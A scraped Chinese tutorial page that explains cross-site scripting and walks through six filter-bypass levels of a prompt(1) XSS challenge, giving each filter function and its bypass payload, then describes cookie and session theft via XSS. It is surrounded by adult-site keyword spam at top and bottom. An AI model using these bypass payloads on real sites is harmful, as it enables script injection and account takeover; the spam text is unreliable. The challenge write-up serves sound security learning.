婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 跨站腳本攻擊XSS(Cross Site Script)的原理與常見場景分析

跨站腳本攻擊XSS(Cross Site Script)的原理與常見場景分析

熱門標簽:防城港市ai電銷機器人 交行外呼系統有哪些 不同的地圖標注 隨州銷售外呼系統平臺 臨滄移動外呼系統哪家有 激戰黃昏地圖標注說明 怎么更改地圖標注電話 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統

前言

前段時間在網上看到一個網址,好奇之下進去看了看。勝利的條件是你錄入一個串,讓其調用prompt(1) 。發現里面有好多想不到的東西,今天終于悠閑了來這里說說XSS。

XSS 原理

跨站腳本攻擊(Cross Site Scripting),為不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故將跨站腳本攻擊縮寫為XSS。惡意攻擊者往Web頁面里插入惡意Script代碼,當用戶瀏覽該頁之時,嵌入其中Web里面的Script代碼會被執行,從而達到惡意攻擊用戶的目的。

XSS 常見場景

一些私人的博客,攻擊者惡意評論,彈出alert,這種充其量也就是一個玩笑。但是如果是盜竊cookie,異常提交請求,這些就比較難受了。

prompt(1)

chrome 版本 62.0.3202.75(正式版本) (64 位)

function escape(input) {
 // warm up
 // script should be executed without user interaction
 return 'input type="text" value="' + input + '">';
} 

第一個

這是一個開胃菜,沒有做任何校驗,這種不設防的在現在已經很少了。他把值直接拼入字符串,組成一個DOM input標簽,那我們只要正確的把標簽閉合掉就可以調用了。

">script>prompt(1)/script> ,拼出來的字符串為input type="text" value="">script>prompt(1)/script>"> ,這樣就等于插入了我們的代碼。

function escape(input) {
 // tags stripping mechanism from ExtJS library
 // Ext.util.Format.stripTags
 var stripTagsRE = /\/?[^>]+>/gi;
 input = input.replace(stripTagsRE, '');
 return 'article>' + input + '/article>'; 
}

第二個

這個已經提升難度了,/\/?[^>]+>/gi匹配>標簽內的所有東西,如輸入script>prompt(1)/script>轉換過后會出現prompt(1),內容里面的標簽被替換掉了。所以這個我們去嘗試不閉合標簽,讓瀏覽器自己去容錯。

img src onerror="prompt(1);" 該方法通過img加載src失敗會調用onerror的想法。

function escape(input) {
 // v-- frowny face
 input = input.replace(/[=(]/g, '');
 // ok seriously, disallows equal signs and open parenthesis
 return input;
} 

第三個

這個就有點略坑了/[=(]/g把所以的=號和(號都替換掉了,這樣我們嘗試調用的時候就不能使用這些東西了。使用的方法是通過模板字符串的標簽模板,這個ES6的特性。 script>prompt`1`/script>看樣子我們這樣寫就可以了,但是為什么沒有生效呢?下面的圖可以看出來,這樣的話傳入的是字符串,判斷是不通過的,所以我們要修改一下script>prompt.call${1}/script> ,這樣就可以跑過驗證了。(話說markdown如何在``里面寫``)

function escape(input) {
 // filter potential comment end delimiters
 input = input.replace(/->/g, '_');
 // comment the input to avoid script execution
 return '!-- ' + input + ' -->';
} 

第四個

這個看上去是把你寫的內容都放在了html的注釋語句里面,并且用/->/g替換了一把。我想到的方案有條件注釋,但是條件注釋這是IE的東西,我們就先不測試了。

--!>img src onerror="prompt(1);" 使用這個可以關閉

function escape(input) {
 // make sure the script belongs to own site
 // sample script: http://prompt.ml/js/test.js
 if (/^(?:https?:)?\/\/prompt\.ml\//i
 .test(decodeURIComponent(input))) {
 var script = document.createElement('script');
 script.src = input;
 return script.outerHTML;
 } else {
 return 'Invalid resource.';
 }
} 

第五個

這個是通過偽造url,我們使用的是訪問帶有用戶名、密碼保護的 URL來偽造。

http://prompt.ml%2f@urlurl為一個網絡地址引用的js,內容為prompt(1)。本來想嘗試一下data:text/html,html>script>prompt(1)/script>/html>但是沒有成功,然后javascript:;about:blank也沒有通過,挺失落。


function escape(input) {
 // apply strict filter rules of level 0
 // filter ">" and event handlers
 input = input.replace(/>|on.+?=|focus/gi, '_');
 return 'input value="' + input + '" type="text">';
} 

第六個

/>|on.+?=|focus/gi替換了>、onxxxx=和focus。通過input特殊的type類型。

`"type=image src onerror

="prompt(1)`

通過xss能做的事情

有很多,絕大多數的網絡攻擊行為都是把xss作為漏洞鏈中的第一環。通過xss,黑客可以得到的最直接的利益就是拿到用戶瀏覽器(或者一些類瀏覽器app)的cookie。由于目前web系統中實現session的辦法主要是cookie,所以一旦黑客拿到了用戶的cookie,就可以劫持用戶的session,從而變相達到盜取用戶賬號的目的。

xss也使黑客可以以受害用戶的ip地址向其他站點發起web攻擊,因為一切的攻擊腳本都可以借受害用戶的瀏覽器執行。
以這樣的方式,將xss配合起csrf、sql注入等漏洞可以在短時間內對一個服務器發起大量攻擊,并且服務端無法將攻擊ip封死,因為ip是成百上千的xss受害者的ip。

2015年github遭遇的大規模DDOS,實際上就是黑客以某種方式把而已腳本植入到“熊場”的廣告聯盟iframe中,從而對github的某些接口實施攻擊,最終達到DDOS的效果。

另外,持久性xss的傳播性極強,由于web的特點是輕量級、靈活性高,每個用戶每天都可能訪問很多web站點,每個web站點每天都有成千上萬的來訪。所以將xss攻擊配合起一些系統內核級的漏洞,完全可能在幾個小時之內擊垮幾百萬臺智能設備。

如今的xss

相比網上很多資料中,在技術上已經發生了很大變化。由于各大網站加強了對于js腳本、html標簽等關鍵信息的過濾,單純依靠植入javascript代碼很難實施攻擊。

PC端頁面,一些視頻類、頁游網站存在大量的flash內嵌在頁面中,可以嘗試將flash代碼植入,往往可以規避網站安全過濾。移動端頁面,可以植入native代碼(android系統植入java,ios系統植入oc)。

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

您可能感興趣的文章:
  • 最新的黑客技術:XSS跨站腳本攻擊詳細介紹
  • 關于跨站腳本攻擊問題
  • 跨站腳本攻擊+Cookies欺騙(Discuz篇)
  • 字符集導致的瀏覽器跨站腳本攻擊分析
  • 也談跨站腳本攻擊與防御
  • UBB的跨站腳本攻擊的漏洞
  • 研究UBB的跨站腳本攻擊之綜合篇
  • PHP常用工具函數小結【移除XSS攻擊、UTF8與GBK編碼轉換等】
  • PHP如何防止XSS攻擊與XSS攻擊原理的講解
  • Web安全之XSS攻擊與防御小結
  • 跨站腳本攻擊XSS原理與防范實例分析

標簽:哈密 沈陽 紅河 無錫 青海 忻州 河源 阜陽

巨人網絡通訊聲明:本文標題《跨站腳本攻擊XSS(Cross Site Script)的原理與常見場景分析》,本文關鍵詞  跨站,腳本,攻擊,XSS,Cross,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《跨站腳本攻擊XSS(Cross Site Script)的原理與常見場景分析》相關的同類信息!
  • 本頁收集關于跨站腳本攻擊XSS(Cross Site Script)的原理與常見場景分析的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    中文字幕av一区二区三区| 亚洲综合在线观看视频| 麻豆视频一区二区| 亚洲色图欧美激情| 国产亚洲自拍一区| 91精品蜜臀在线一区尤物| 成人美女在线视频| 国产综合色产在线精品| 日韩高清电影一区| 亚洲第一综合色| 一区二区三区精品| 中文字幕亚洲在| 国产精品亲子伦对白| 久久久久久久综合日本| 精品国产乱子伦一区| 欧美tk丨vk视频| 精品国产污污免费网站入口| 91.成人天堂一区| 91精品国产综合久久精品麻豆| 欧美最新大片在线看| 色狠狠av一区二区三区| 91成人看片片| 91麻豆免费在线观看| 91麻豆国产福利在线观看| 91女厕偷拍女厕偷拍高清| 91成人在线精品| 欧美一区二区网站| 日韩一区二区三区视频在线观看| 欧美性xxxxxxxx| 欧美视频三区在线播放| 欧美影片第一页| 99麻豆久久久国产精品免费 | 欧美人成免费网站| 欧美性生活一区| 91精品国产综合久久精品图片| 日韩欧美国产综合| 久久精品一区二区三区不卡| 中文字幕亚洲成人| 亚洲国产日韩a在线播放性色| 日韩综合一区二区| 狠狠色狠狠色综合系列| 懂色中文一区二区在线播放| 91亚洲精华国产精华精华液| 在线一区二区三区四区五区| 5月丁香婷婷综合| 国产欧美日韩精品在线| 夜夜嗨av一区二区三区四季av| 麻豆精品一区二区三区| 不卡av电影在线播放| 成人性生交大片免费看中文| 亚洲成人免费观看| 久久精品国产亚洲高清剧情介绍| 福利电影一区二区| 欧美色综合网站| 久久综合久久综合久久| 亚洲一区二区四区蜜桃| 国产麻豆日韩欧美久久| 欧美午夜精品免费| 久久久亚洲综合| 亚洲大片在线观看| 国产91丝袜在线观看| 欧美视频你懂的| 国产精品久久久久久一区二区三区 | 国产精品久久久久久久久快鸭| 亚洲国产一区二区三区青草影视| 精品一二线国产| 欧美午夜电影网| 国产精品看片你懂得| 日本美女视频一区二区| 91在线播放网址| 久久久久久毛片| 日日骚欧美日韩| 色噜噜久久综合| 久久精品视频网| 毛片av一区二区三区| 国产成人精品网址| 日韩午夜精品电影| 亚洲成av人片在www色猫咪| 国产99精品视频| 精品国产成人在线影院| 日韩精品一二三四| 91福利小视频| 亚洲激情av在线| 91一区一区三区| 自拍偷拍欧美精品| 国产成人午夜片在线观看高清观看| 91精品国产综合久久久久久久久久 | 久久久精品国产免大香伊 | 91色九色蝌蚪| 欧美国产精品v| 国产一区在线观看视频| 精品国产免费久久| 韩国成人精品a∨在线观看| 欧美一区二区精品| 青青青伊人色综合久久| 91精品国产免费久久综合| 亚洲第一搞黄网站| 欧美性大战xxxxx久久久| 午夜视频一区在线观看| 欧美精品一级二级三级| 日韩精品福利网| 日韩一级免费观看| 国产精品亚洲人在线观看| 久久久电影一区二区三区| 国产91在线看| 亚洲女同ⅹxx女同tv| 色综合久久综合网97色综合| 亚洲欧美日韩电影| 欧美日韩你懂得| 免费人成在线不卡| 精品国精品自拍自在线| 国产在线播精品第三| 欧美成人官网二区| 国产99精品国产| 有码一区二区三区| 欧美日韩激情一区| 国模娜娜一区二区三区| 中文乱码免费一区二区| 99久久久免费精品国产一区二区 | 久久国产尿小便嘘嘘尿| 久久综合国产精品| 成人一区二区三区视频在线观看| 国产精品传媒视频| 欧美午夜一区二区| 国产主播一区二区| 亚洲伦在线观看| 日韩免费电影一区| 99久久er热在这里只有精品15| 亚洲一区二区三区小说| 日韩一区二区在线观看| www.色精品| 青青国产91久久久久久| 亚洲品质自拍视频| 日韩免费成人网| 色偷偷久久人人79超碰人人澡| 日本午夜精品视频在线观看 | 久久久久久99精品| 91久久奴性调教| 国产一区二区三区综合| 亚洲色图色小说| 久久综合九色综合欧美98| 欧美在线观看一区二区| 国产成人精品一区二区三区网站观看| 亚洲国产精品自拍| 欧美激情一区二区三区四区| 欧美一区二区啪啪| 色哟哟国产精品| 国产成人免费视频一区| 丝袜亚洲另类欧美| 亚洲人精品一区| 久久久久久久久岛国免费| 91精品国产综合久久国产大片| 色综合天天综合色综合av| 国产激情视频一区二区在线观看| 亚洲午夜日本在线观看| 国产精品久久久久一区| 久久久久久久久伊人| 91精品国产欧美一区二区| 欧美在线一二三四区| 一道本成人在线| 成人国产一区二区三区精品| 久久爱另类一区二区小说| 五月天国产精品| 亚洲一区影音先锋| 国产精品国产三级国产aⅴ中文 | 亚洲午夜免费电影| 一区二区成人在线| 亚洲丝袜另类动漫二区| 亚洲国产高清在线| ww久久中文字幕| 欧美成va人片在线观看| 97超碰欧美中文字幕| 国产成人亚洲综合a∨婷婷| 国产一区视频导航| 国产精品18久久久久久久久| 精品一区二区三区在线观看| 美女一区二区久久| 麻豆国产精品视频| 韩国中文字幕2020精品| 九九热在线视频观看这里只有精品| 免费成人结看片| 韩国女主播成人在线| 久久激情五月激情| 国产伦精品一区二区三区视频青涩 | 麻豆高清免费国产一区| 蓝色福利精品导航| 欧美aaaaa成人免费观看视频| 奇米在线7777在线精品 | 97久久久精品综合88久久| av激情综合网| 色老综合老女人久久久| 欧美日韩精品福利| 精品国产一区二区三区久久影院| 337p粉嫩大胆色噜噜噜噜亚洲 | 亚洲三级在线观看| 亚洲精品免费看| 日本女人一区二区三区| 国产999精品久久久久久| 91麻豆国产精品久久| 91麻豆精品久久久久蜜臀|